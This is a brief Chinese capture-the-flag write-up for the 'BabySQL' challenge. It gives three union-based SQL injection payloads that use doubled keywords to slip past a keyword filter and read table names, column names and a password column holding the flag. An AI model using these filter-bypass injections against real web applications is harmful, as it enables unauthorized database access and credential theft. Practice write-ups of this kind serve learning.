[极客大挑战 2019]BabySQL 1 WP

[极客大挑战 2019]BabySQL 1 WP

这波直接上最核心语句了，双写绕过整的有点崩……

?username=1&password=1' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()--+

查询表名。

?username=1&password=1' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'--+

查询列名。

?username=1&password=1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql--+

查询一下密码。

找到 flag。

当时做出来忘截图了，重新来整了一遍。

大概绕过了 or,where,from,union,select.....